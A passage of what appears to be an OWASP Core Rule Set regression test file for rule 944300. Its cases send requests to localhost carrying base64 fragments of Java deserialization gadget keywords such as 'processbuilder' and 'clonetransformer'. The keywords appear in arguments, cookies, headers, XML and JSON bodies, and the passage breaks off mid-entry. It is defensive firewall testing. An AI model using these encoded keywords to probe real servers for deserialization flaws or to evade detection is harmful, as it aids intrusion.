"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-58 + desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm9jZXNzYnVpbGRlcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-59 + desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm9jZXNzYnVpbGRlcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-60 + desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm9jZXNzYnVpbGRlcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-61 + desc: "XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-62 + desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-63 + desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-64 + desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-65 + desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-66 + desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-67 + desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-68 + desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-69 + desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-70 + desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-71 + desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-72 + desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-73 + desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-74 + desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-75 + desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-76 + desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-77 + desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-78 + desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-79 + desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-80 + desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GNsb25ldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-81 + desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GNsb25ldHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-82 + desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GNsb25ldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-83 + desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-84 + desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-85 + desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-86 + desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-87 + desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-88 + desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-89 + desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-90 + desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-91 + desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-92 + desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BjbG9uZXRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-93 + desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-94 + desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-95 + desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-96 + desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-97 + desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-98 + desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-99 + desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-100 + desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-101 + desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-102 + desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Zm9yY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-103 + desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Zm9yY2xvc3VyZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-104 + desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Zm9yY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-105 + desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-106 + desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: 